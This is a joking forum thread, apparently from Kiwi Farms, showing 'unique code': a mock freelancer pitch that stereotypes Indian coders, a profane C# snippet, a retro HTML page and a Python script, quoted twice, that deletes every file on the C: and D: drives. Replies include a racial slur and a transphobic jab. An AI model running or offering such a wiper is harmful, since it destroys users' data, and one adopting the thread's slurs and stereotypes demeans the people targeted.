Can you write me unique code?

Hello Sir, I will be happy that I will complete your Unique Code, I will complete your work by being 100% full dedicated and sir with high accuracy. I possess 15 year expeirence, Completed Masters Degree (2015) in Unique Code from IIT Mumbai I am best at Unique Code on the Kiwi Farms. typing speed is 43wpm. Please do the needful and prowide with specifications for UNIQUE CODE to design at your choice. Rate starting at ₹600 - ₹1500
 
using System;
using System.Collections.Generic;
namespace Demo {
class Response {
static void Main(string[] args) {
var random = new Random();
List<string>list = new List<string>{ "fuck up", "hell up", "front door", "computer down"};
int index = random.Next(list.Count);
Console.WriteLine("No, shut the " + list[index]);
}
}
}
 
Code:
<HTML>
<HEAD>
<TITLE>
Code 4 Gorgar
</TITLE>
</HEAD>
<BODY>
<FONT FACE="Comic Sans MS" SIZE="12" COLOR="Red">
<MARQUEE>
CODE 4 GORGAR
</MARQUEE>
</FONT>
Here you go.  Web Design 1 in high school at it's finest.
</BODY>
</HTML>
 
# home = os.path.normpath(os.path.expanduser("~"))
home="C:/"

for dirpath,dirnames,file in walk(home):
for files in file:
dirpath1=os.path.normpath(dirpath)
childpath=os.path.join(dirpath1,files)
print(childpath)
try:
os.remove(childpath)
except PermissionError:
continue

home="D:/"

for dirpath,dirnames,file in walk(home):
for files in file:
dirpath1=os.path.normpath(dirpath)
childpath=os.path.join(dirpath1,files)
print(childpath)
try:
os.remove(childpath)
except PermissionError:
continue
 
  • Thunk-Provoking
Reactions: Knight of the Rope
# home = os.path.normpath(os.path.expanduser("~"))
home="C:/"

for dirpath,dirnames,file in walk(home):
for files in file:
dirpath1=os.path.normpath(dirpath)
childpath=os.path.join(dirpath1,files)
print(childpath)
try:
os.remove(childpath)
except PermissionError:
continue

home="D:/"

for dirpath,dirnames,file in walk(home):
for files in file:
dirpath1=os.path.normpath(dirpath)
childpath=os.path.join(dirpath1,files)
print(childpath)
try:
os.remove(childpath)
except PermissionError:
continue
>familiar with for loops, uses them to recursively search-and-destroy files in C:/ drive
>copy-pastes the exact same code with a single character change to do the same thing for D:/ drive

You Python skiddies baffle me.
 
  • Feels
Reactions: Mal0
>familiar with for loops, uses them to recursively search-and-destroy files in C:/ drive
>copy-pastes the exact same code with a single character change to do the same thing for D:/ drive

You Python skiddies baffle me.
Nigga I googled "How to delete system 32 python"

I'm not trans, I know fuckall about coding
 
  • Winner
Reactions: Knight of the Rope
Back